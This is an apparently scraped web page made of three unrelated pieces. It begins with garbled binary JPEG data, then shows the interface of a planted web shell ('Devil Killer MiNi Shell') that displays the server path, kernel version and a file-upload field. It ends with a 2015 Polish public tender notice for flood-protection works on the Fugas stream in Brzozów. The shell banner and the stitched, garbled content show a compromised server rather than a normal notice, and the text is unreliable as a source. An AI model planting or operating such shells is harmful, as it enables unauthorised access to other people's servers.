JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150402/75032-N-2015.html

<p class="kh_header"><b>Rzeszów: Wykonanie zadania pn.: Potok FUGAS - zabezpieczenie przeciwpowodziowe obszarów zalewowych położonych wzdłuż potoku Fugas w km 0+000-0+350 w miejscowości Brzozów, woj. podkarpackie.</b><br>
<b>Numer ogłoszenia: 75032 - 2015; data zamieszczenia: 02.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podkarpacki Zarząd Melioracji i Urządzeń Wodnych , ul. Hetmańska 9, 35-959 Rzeszów, woj. podkarpackie, tel. 17 8537 440, faks 17 8536421.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Wojewódzka samorządowa jedn. org. nieposiadająca osobowości prawnej (jedn. budżet.)..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie zadania pn.: Potok FUGAS - zabezpieczenie przeciwpowodziowe obszarów zalewowych położonych wzdłuż potoku Fugas w km 0+000-0+350 w miejscowości Brzozów, woj. podkarpackie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest budowa urządzeń wodnych służących zabezpieczeniu przeciwpowodziowemu obszarów zalewowych wzdłuż potoku Fugas w km 0+000 - 0+350 w miejscowości Brzozów, woj. podkarpackie. Planowane jest wykonanie regulacji i konserwacji potoku Fugas w km 0+000 - 0+350, budowa rurociągu O2000 mm z rur CC GRP lub równoważnych wraz z budową komory rozdzielczej i wylotem żelbetowym (w tym roboty przygotowawcze, ziemne, odwodnienie wykopów, roboty konstrukcyjne, kanalizacja deszczowa o średnicy 400 mm i przykanaliki, budowle na sieci, budowa wylotu rurociągu o średnicy 2000 mm do rzeki Stobnicy, ubezpieczenie w rejonie wylotu rzeki Stobnicy wraz z wykonaniem schodów żelbetowych)   przełożenie urządzeń  kolidujących z projektowaną regulacją potoku Fugas oraz rurociągiem O2000 mm (sieć wodociągowa i gazowa), przebudowa przepustu drogowego ( w ciągu ulicy 3-go Maja).

2.Zakres przedmiotu zamówienia:
1)Regulacja i konserwacja potoku Fugas,
2)Budowa rurociągu O2000 mm z rur CC GRP lub równoważnych wraz z budową komory rozdzielczej i wylotem  żelbetowym
2.1)Roboty przygotowawcze, ziemne oraz odwodnienie wykopów,
2.2)Roboty konstrukcyjne, kanalizacja deszczowa o średnicy 400 mm i przykanaliki,
2.3.)Budowle na sieci, 
2.4.) Budowa wylotu rurociągu o średnicy 2000 mm do rzeki Stobnicy,
2.5.)Ubezpieczenie w rejonie wylotu rzeki Stobnicy wraz z wykonaniem schodów żelbetowych, 
3)Przełożenie urządzeń  kolidujących z projektowaną regulacją potoku Fugas oraz rurociągiem O2000 mm (sieć wodociągowa i gazowa),  
4)Przebudowa przepustu drogowego wraz z budową kanalizacji deszczowej O400 mm,

3.Opis zakresu przedmiotu zamówienia:

1)Regulacja i konserwacja potoku Fugas
Dla  regulowanego  odcinka  przyjęto  następujące  wymiary  umocnionego przekroju regulowanego koryta potoku Fugas w km 0+270 - 0+350:
- szerokość dna 1,50 m,
- nachylenie skarp 1:1,5,
- spadki dna od 3%,
- głębokość od h = 1,40 m do 1,74 m,
- ubezpieczenie dna: narzut kamienny gr. 30cm, po bokach krawężniki drogowe 30x15x100cm zatopione w beton,
- ubezpieczenie  skarp: bruk  kamienny  zatopiony  w  betonie  do  wysokości wody Q1%  wyżej, obsiew mieszanką traw,
- zakończenie   odcinka   regulowanego   komorą   rozdzielczo   -   przelewową O3000mm,
- ubezpieczenie dna i skarp na górnym i dolnym połączeniu z korytem istniejącym zostanie  zabezpieczone palisadą z pali O10-12 cm, długości 1,50 m.

Na regulowanym odcinku od km 0+270 do 0+350 przewidziano do wykonania:
- regulację koryta na długości 0,080 km
-  umocnienie dna narzutem kamiennym grubości 30 cm 27,5 m2
-  umocnienie   skarp   brukiem   kamiennym   zatopionym  w betonie pasem 2,5m  305 m2
-  palisada z pali O10-12 cm, długości 1,50 m  7,00m                                       
-  skarpowanie w gr. III i IV kat.  366 m2     
-  obsiew mieszanką traw skarp potoku 1220 m2
-  obsiew terenu po rozplantowanym urobku  i zniszczeniach
   w czasie regulacji 1800 m2                                             
-  przebudowa   przepustu   drogowego   2   O1000   mm   na   przepust 1 szt.
  ramowy 2,00x3,00m (droga wojewódzka), L= 19,00 m

- poręcze;  barierka  wygrodzeniowa  typu  U-12a,  wysokość  h=1,2  m - 50 m w    rejonie    planowanej    w   przyszłości    przez    szpital    drogi wewnętrznej  jednokierunkowej  wzdłuż  górnej  krawędzi  skarpy na regulowanym  odcinku  potoku  w  km  0+270  -  0+320,  po  stronie północnej  przewiduje  się  wykonanie  barierek  wygrodzeniowych typu    U-12a.  Pojedynczy    moduł    barierki    wykonany    jest    metalowych   kształtowników,   zabezpieczony   powłoką   cynkową, opcjonalnie malowany proszkowo lub oklejany folią odblaskową. 

Dla   konserwowanego   odcinka   przyjęto   następujące   wymiary   istniejącego przekroju koryta potoku Fugas w km 0+000 - 0+270
- Szerokość istniejącego dna 1,0 -1,2 m,
- Nachylenie skarp 1:1,
 - Spadki dna 4% - 5%,
- Głębokość h = 0,6 m - 1,30 m,
- Ubezpieczenie istniejące w dnie - płyty typ JOMB, ubezpieczenie istniejące skarp - płyty typ JOMB i wyżej porost traw - odmulenie dna potoku (naniesiony namuł)- 215 m, naprawa  istniejących  ubytków  w  ubezpieczeniu  płytkami  betonowymi  typ: JOMB- 40 m2
- Przepusty lub mostki - dojazd do posesji - stan dobry, rurociąg O1500mm pod ul. Piastową i drogą dojazdową gminną - odmulenie istniejących przepustów, rurociągu  O1500 mm -   55m.

2)Budowa rurociągu O2000 mm z rur CC GRP lub równoważnych wraz z budową komory rozdzielczej i wylotem  żelbetowym

2.1.) Roboty przygotowawcze, ziemne oraz odwodnienie wykopów,
Należy wykonać prace pomiarowe przy liniowych robotach ziemnych na trasie rurociągu na długości 0,270 km.  Całość   rurociągu   oraz   komór   dodatkowo   projektuje   się   posadowić   na wzmocnionym  podłożu  (wymiana  gruntu) na  materacu.  Roboty ziemne związane z wyminą gruntu  obejmują m.in. wykonanie wykopów w gruntach kat. III i IV, zasypanie oraz roboty towarzyszące. Odwodnienie wykopów wykonać poprzez studzienki drenażowe w dnie wykopu.  Nadmiar urobku po  wykopach rozplantować, obsiać mieszanką traw teren wokół robót. 
 
2.2.) Roboty konstrukcyjne, kanalizacja deszczowa o średnicy 400 mm i przykanaliki 
Z   uwagi   na   słaby   grunt   rurociąg   posadowić   należy   na   materacu szerokości 2,20 m składającym się z warstw wg przekroju na profilu podłużnym tj.: 
- Pospółka (piasek) 1 -20 mm - 10 cm 
- geosiatka 
- tłuczeń - 40 - 60 mm warstwa 40 cm 
- geosiatka 
- geotekstyl 
Uwaga: Do wzmocnienia podłuża pod materac tłuczniowy stosować należy geowłókniny separacyjno - filtracyjne o minimalnych parametrach (wytrzymałość na rozciąganie - 18 %; wydłużenie przy zerwaniu (wzdłuż) - 55 %,wytrzymałość przy przebiciu - 3000 N; masa - 270 g na m2)
Po przygotowaniu podłoża należy ułożyć kanał z rur CC  GRP lub równoważnych. 
Stosować należy geosiatkę o wielkości oczek 35x35 mm i podstawowych parametrach minimalnych: (wytrzymałość na rozciąganie -50 kN na m; wydłużenie przy zerwaniu - 12,5 %; masa - 270 g na m2)

Uwaga: Nie dopuszczalne jest prowadzenie prac budowlanych na odcinku  przekraczającym  ulicę Piastową w trakcie trwania przebudowy przepustu  w ul. 3-go Maja

Ponadto należy wykonać  dwa  odcinki kanalizacji deszczowej o średnicy O400 mm na długości 12 m. Na odcinkach tych zlokalizowane będą dwie  studnie  betonowe  o  średnicy  O1000  mm.  Studnie  te  wyposażyć  należy  w przejścia  szczelne  i  wykonać  w  nich  połączenia  rurociągów  istniejących.  Studnie wyposażyć  należy  w  pierścienie  odciążające  oraz  pokrywy  i  kratki  ściekowe  typu ciężkiego D400 (do 40 T). Rurociągi wykonać należy z rur CC-GRP lub równoważnych. W kilometrze 0+319   wylotem   betonowym   odprowadzony   będzie   odcinek kanalizacji deszczowej o średnicy O400 mm. Rurociągi układać należy na podsypce z piasku o grubości min. 20 cm. Po  ułożeniu  rurociągu  i  dokonaniu  odbioru  w  zakresie  wykonanego  podłoża oraz szczelności   zmontowanego   rurociągu,   wykonać   należy   obsypkę z piasku  w   strefie ochronnej   rurociągu   do   wysokości   około   30   cm   ponad   rurociąg   z zagęszczeniem jej  do  wskaźnika  minimum  Ls=95%  wg  Proctora.  Pozostały   wykop pozostawić należy w celu umożliwienia wykonania podbudowy i nawierzchni zgodnie z branżą drogową.
   
2.3.) Budowle na sieci 
Równolegle  do  ulicy  Piastowej  wykonany  zostanie  rurociąg  z  rur  CC  GRP lub równoważnych  O2000 mm odprowadzający nadmiar wód opadowych z potoku Fugas do rzeki Stobnicy.
Rurociąg  zaczynał  się  będzie  w  komorze  rozdzielczo  -  przelewowej  O3000 mm  znajdującej  się  w  km  0+270  biegu  potoku  Fugas.  Zadaniem  komory  będzie kierowanie  wód  normalnych  do  rurociągu  pod  ul.  Piastową  do  istniejącego  koryta, zaś wód burzowych (powodziowych) do projektowanego rurociągu O2000 mm.
Rurociąg  O2000  mm  z  rur  CC-GRP lub równoważnych wyposażony  zostanie  w  zintegrowane komory  włazowe  O1200  mm  (11  szt.).  Włazy  do  studzienek  O600  mm  wg  PN-H- 74051-2   klasy   D-400   osadzone   w   żelbetowej   płycie   przykrywającej,  opartej   na pierścieniu odciążającym.
Wysokość   komory   K3   dostosować   należy   do   wysokości   projektowanego nasypu    drogowego    -    chodnika    (rzędna    góry    276,23    m    n.p.m.).    Komora zlokalizowana  jest  poza  terenem  obciążonym  kołowo,  dlatego  też  jej  tymczasowe wystawanie 1,5 m ponad teren nie będzie miało negatywnego wpływu. Wody   z   rurociągu odprowadzone   zostaną   do   rzeki   Stobnica   wylotem betonowym O2000 mm w km rzeki 33+422. Komory   przewiduje   się   posadowić   na   podbudowie z   betonu   gr.  15   cm, na podsypce   z   pospółki   gr.  10   cm   o  granulacji  gr.  20   cm   zagęszczonego   do współczynnika 95%.  Natomiast  komorę  należy obetonować  betonem  C12 ) 15  ponad  średnicę  rury,  warstwą  15  cm   -  jako  blok betonowy dociążający. Przy komorze rozdzielczej należy wykonać przyczółek żelbetowy  wlotowy. Montaż kraty zabezpieczającej na wlocie wykonać z prętów stalowych. 
Komorę   rozdzielczo   przelewową   przewiduje   się   wykonać   jako   element monolityczny z   tworzywa   CC-GRP lub równoważny,   wykonany   na   zamówienie. Jako  element  bazowy  wykorzystana  zostanie  studnia  O3000  mm. Od  strony  dopływu  wody  wykonany  zostanie  wlot  prostokątny o  wymiarach  2,5x1,8 m.  Wlot  osadzony  zostanie  w  przyczółku  żelbetowym  o  wymiarach  5,95x3,4  m  i szerokości  0,4  m.  Wody  małe  przeprowadzone  będą  rynną  wykonaną  z  części  rury O1000  mm  (wysokości  30  cm),  której  ścięta  krawędź  stanowić  będzie  jednocześnie krawędź  przelewową.  Wody  nie  mieszczące  się  w  rynnie  przelewać  się  będą  po pochylni do rurociągu O2000 mm, którym odprowadzane będą do rzeki Stobnica.
Komora  wyposażona  będzie  we  właz  żeliwny  typu  lekkiego  o  średnicy  600 mm  umożliwiający  inspekcję,  jednak  wejście  do  jej  wnętrza  będzie  możliwe  wlotem.    W    celu    zabezpieczenia    komory    przed    wejściem    osób    niepożądanych    wlot zabezpieczony zostanie kratą z prętów stalowych O20 mm. Dla umożliwienia zejścia ze skarpy przy przyczółku wykonane zostaną schody żelbetowe szerokości 1,0 m.
Komorę  przewiduje  się  posadowić  na  podbudowie  z  betonu  gr.  15  cm, na podsypce z   pospółki   gr.   10   cm   o   granulacji   gr.   20   cm   zagęszczonego   do współczynnika 95%.

2.4.) Budowa wylotu rurociągu o średnicy 2000 mm do rzeki Stobnicy
Wody   z   rurociągu   O2000   mm   odprowadzone   zostaną   do   rzeki   Stobnica wylotem żelbetowym w km rzeki 33+422 o konstrukcji:
- Ścianki czołowe o wym. 4,25x3,77x0,40m
- Ścianki   boczne   równoległe   do   osi   kolektora   o   długości   7,20   m   i wysokości 2,77 m przy ściance czołowej oraz 0,3 m na końcu wypadu
- Płyty  wypadowej  o  spadku  1,4%  o  wym.  7,20x4,85x0,3  m  wraz  ze ścianka oporową o wym. 4,25x0,5x0,40 m
- Zakończenie z grodzic stalowych wysokości 3,0 m dł. 4,25 m

Wylot   wykonany   zostanie   z   betonu   hydrotechnicznego   C-25)30   o   klasie wodoszczelności W-6, mrozoodporny. Projektowany  wylot  posadowić  należy  na  podsypce  żwirowo  -  piaskowej  gr. 10 cm oraz warstwie chudego betonu C-8)10 także grubości 10 cm. Wylot   wykonywać   należy   w   osłonie   ze   ścianek   bocznych   (grodzic G-62 lub równoważne).   Po zakończeniu  robót  grodzice  wzdłuż  ścianki czołowej od  strony  wody  należy  przyciąć do  jej  wysokości.  Grodzice  wzdłuż  ścianek  bocznych  po  zakończeniu  prac  należy zdemontować. Wylot  zabezpieczony  zostanie  kratą  zamykaną  na  kłódkę  z  prętów  stalowych O20  mm.  

2.5.) Ubezpieczenie w rejonie wylotu rzeki Stobnicy wraz z wykonaniem schodów żelbetowych 
W  rejonie  wylotu  przewiduje  się  wykonanie  ubezpieczenia  na  długości  20  m (10  w górę  i w  dół   od  wylotu)  dna  i  skarpy  rzeki  Stobnica  w  km  33+412  - 33+432. W  dnie  u  podstawy  skarpy  opaska  faszynowa  o  wym.  25x50  cm  pomiędzy rzędami pali o długości 1,5 m. W dnie narzut kamienny grubości 30 cm na faszynadzie - faszynie gr. 25 cm. Skarpy  -  narzut  kamienny w  płotkach  faszynowych  o  wymiarach  1x1  m  na całej wysokości skarpy. Na  początku  i  na  końcu  umocnienia  dna  przewiduje  się  wykonanie  narzutu kamiennego w formie stożka o długości 10 m. Dla  umożliwienia  zejścia  ze  skarpy  wykonane  zostaną  schody  żelbetowe szerokości 1,0 m.
Rodzaj    ubezpieczenia    dobrano    jako    kontynuację    ubezpieczenia wyszczególnionego w    warunkach    wydanych    przez    Podkarpacki    Zarząd Melioracji  i  Urządzeń  Wodnych w  Rzeszowie  Firmie  ARCADIS  Sp.  z  o.o.  Biuro Infrastruktury  Drogowej  w  Rzeszowie      ul.  Chodkiewicza  7  -  projektującej  most na rzece Stobnica.
Projektowany  wylot  znajduje  się  w  odległości  38  m  poniżej  osi  projektowanego mostu (zjazd z projektowanej obwodnicy miasta Brzozowa).
Do    projektowanego    rurociągu    włączone    zostaną    również    istniejące kanalizacje  deszczowe  oraz  kanalizacja  projektowana  w  ramach  budowy  obwodnicy Brzozowa. 

3)Przełożenie urządzeń  kolidujących z projektowaną regulacją potoku Fugas oraz rurociągiem O2000 mm (sieć wodociągowa i gazowa).  
Zaprojektowano  przełożenie  istniejących  odcinków  gazociągu  z  rur  PE100  SDR 17,6  o  średnicy  O160)9,1  mm.  Długość  przekładanych  odcinków  wynosi  27  i  114  m. Projektowany   odcinek   gazociągu   o   długości   27   m   (oznaczony   na   projekcie zagospodarowania terenu literami D - E) usytuowany będzie poniżej projektowanego dna  rowu  na  głębokości  1,1  m,  a  następnie  równolegle  do  niego  w  pasie  pomiędzy skarpą,  a  projektowaną  przez  Szpital  Specjalistyczny  w  Brzozowie  drogą  wjazdowa na  parking.  Na  odcinku  pod  dnem  potoku  gazociąg  zabezpieczony  zostanie  rurą ochronną PE100 SDR 17,6 O280)16 mm o długości 7 m. Rura przewodowa  w rurze ochronnej  powinna  być  usytuowana  centrycznie  przy  użyciu  płóz  dystansujących,  a jej końce winny być zabezpieczone manszetami gumowymi.
Odcinek  prowadzony  równolegle  do  rurociągu  (F  -  M  -  G)  długości  114  m przewiduje się wykonać z rur PE100 SDR 17,6 o średnicy O160)9,1 mm. Włączenie  istniejącego  przyłącza  do  kotłowni  szpitala  (w  punkcie  M)  wykonać należy poprzez trójnik łączony za pomocą zgrzewania doczołowego. W   miejscach skrzyżowań  gazociągu  z  kanalizacją  odległość  mierzona  od  zewnętrznych  krawędzi rur nie może być mniejsza niż 0,2 m. Dla   gazociągów   z   rur polietylenowych  dopuszcza  się  występowanie  rys  i  zadrapań,  których  głębokość  nie przekracza 10% grubości ścianki, lecz nie więcej niż 0,5 mm. Łączenie rurociągów wykonać metodą zgrzewania doczołowego. Gazociąg   należy   układać   na   wyrównanym   podłożu   i   podsypce   o   grubości warstwy   0,1   m   z   piasku   lub   przesianego   gruntu   rodzimego.   Nad   gazociągiem wykonać nadsypkę o grubości warstwy 0,1 m. Nadsypkę należy zagęścić. Gazociąg  po  dostatecznym  utwardzeniu  łączy  powinien  być  poddany  próbie wytrzymałości   i   szczelności   zgodnie   z   PN-92)M-34503.   
Dla  budowanego  gazociągu  przewidzieć  należy  strefę  ochronną  o  szerokości  1 m, której środek pokrywa się z osią gazociągu. (niezależnie od klasy jego lokalizacji).

Zaprojektowano również przebudowę wodociągu PE40 mm 
Projektowane  odcinki  mają  za  zadanie  zastąpić  istniejące  w  związku  z czym ich średnicę pozostawia się bez zmian tj. O40 mm. 
Włączenie  do  istniejącej  sieci  wykonane  zostanie  w  punktach  A,  B  i  C (szczegóły w dokumentacji projektowej)  po wcześniejszym   zamknięciu   przepływu   wody.   Dodatkowo   w   punkcie   A   odcięty zostanie   odcinek   wodociągu   wB50   do   budynku   szpitala.   Odłączony   odcinek zabezpieczyć należy poprzez jego zamkniecie. Z  uwagi  na  przełożenie  odcinka  krzyżującego  się  z  rurociągiem  O2000  mm powyżej   oraz,   że   cały   przekładany   odcinek   nie   będzie   miał   rozgałęzień   nie przewiduje się stosowania armatury odcinającej. Projektowany odc. A-B (szczegóły w dokumentacji projektowej) odsunięty będzie poza zasięg robót na odległość ok. 5,0 m od rurociągu. Jako   materiał   stosować   należy   rury   PE100   SDR17   o   średnicy   O40   mm. Dodatkowo  w  miejscu  skrzyżowania  z  rurociągiem  na  wodociąg  należy  nałożyć  rurę ochronną  PE80  SDR17  średnicy  350  mm  dostosowaną  kształtem  do  rurociągu,  a wolną   przestrzeń   pomiędzy   rurą   przewodową,   a   ochronną   wypełnić   pianką poliuretanową.    Takie rozwiązanie    zapewni    rurociągowi    odpowiednią    izolacje termiczną. Na  całej  długości  (z  wyjątkiem  odcinka  A-C)  projektuje  się  wykonanie  sieci wodociągowej na głębokości osi min 1,7 m tj. z przykryciem rurociągu 1,6 m wg PN- B-10725  Wodociągi  -  Przewody  zewnętrzne  -  Wymagania  i  badania  dla  III  strefy przemarzania gruntu.

4)Przebudowa przepustu drogowego wraz z budową kanalizacji deszczowej O 400 mm
Przebudowa  przepustu drogowego polegać  będzie  na rozebraniu   istniejącego   przepustu i   budowie   nowego   o   przekroju   poprzecznym skrzynkowym  2,0x3,0 m  (światło  przepustu) i  długości 19,0m.  Projektowany  przepust drogowy zostanie   wykonany,   jako   konstrukcja   żelbetowa   monolityczna   z   wykorzystaniem prefabrykowanych  elementów  obudowy.  Brzegi  oraz  dno  potoku  Fugas  zostaną umocnione w postaci narzutu kamiennego o gr. 30cm, układanego na dnie oraz bruku zatopionego w betonie na skarpach.
W  związku  z  przebudową  przepustu drogowego,  istniejąca  droga  nad  przepustem, zostanie  rozebrana  na  długości  niezbędnej  do  wykonania  przebudowy  istniejącego przepustu.   Po   przebudowie   przepustu   odcinek   drogi   zostanie   odtworzony   po istniejącym  śladzie  w  postaci  jezdni  o  nawierzchni  bitumicznej  i  przekroju  ulicznym. Szerokość  jezdni  na  prostej  będzie  wynosić  8,0m  z  poszerzeniem  na  łuku  do  9,0m. Jezdnia  z  każdej  strony  będzie  ograniczona  krawężnikami.  Ponadto  z  każdej  strony jezdni przebiegać będzie chodnik dla pieszych o szerokości 2,0m (nawierzchnia z kostki brukowej betonowej z betonu C40)50 szarej - gr. 6 cm).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających. 
Przedmiotem zamówień uzupełniających będą roboty tego samego rodzaju i zgodne z robotami wchodzącymi w zakres przedmiotu zamówienia podstawowego. 
Wartość zamówień uzupełniających wynosić będzie maksymalnie 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.12.00-0, 45.24.00.00-1, 45.34.20.00-6, 45.23.11.10-9, 45.24.36.00-8, 45.23.13.00-8, 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Zamawiający wymaga wniesienia wadium w wysokości 30 000 zł
2)	Wadium może być wniesione w jednej lub kilku formach. O których mowa w art. 45 ust. 6 ustawy - Prawo zamówień publicznych.
3)	Miejsce, sposób i termin wniesienia wadium:
-Wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy zamawiającego na konto Nr 60 1930 1389 2700 0722 5266 0006 w Banku Polskiej Spółdzielczości S.A. Oddział Regionalny 
w Rzeszowie z dopiskiem: Wadium na przetarg na wykonanie zadania pn.: Wykonanie zadania pn.: Potok FUGAS - zabezpieczenie przeciwpowodziowe obszarów zalewowych położonych wzdłuż potoku Fugas w km 0+000-0+350 w miejscowości Brzozów, woj. podkarpackie.  
-Kserokopię przelewu potwierdzoną za zgodność z oryginałem przez wykonawcę należy dołączyć do oferty. Warunkiem uznania wpłaty wadium będzie wpływ przekazanych środków na rachunek zamawiającego przed upływem terminu składania ofert. 
- Wadium wnoszone w innych dopuszczalnych formach wyszczególnionych w art. 45 ust. 6 ustawy 
w oryginale złożyć w siedzibie zamawiającego (Rzeszów, ul. Hetmańska 9) przed upływem terminu składania ofert, a kopię dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunki udziału w postępowaniu i posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.

Ocena spełnienia przez Wykonawcę powyższego warunku zostanie dokonana na podstawie oświadczenia Wykonawcy stanowiącego załącznik nr 2 do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
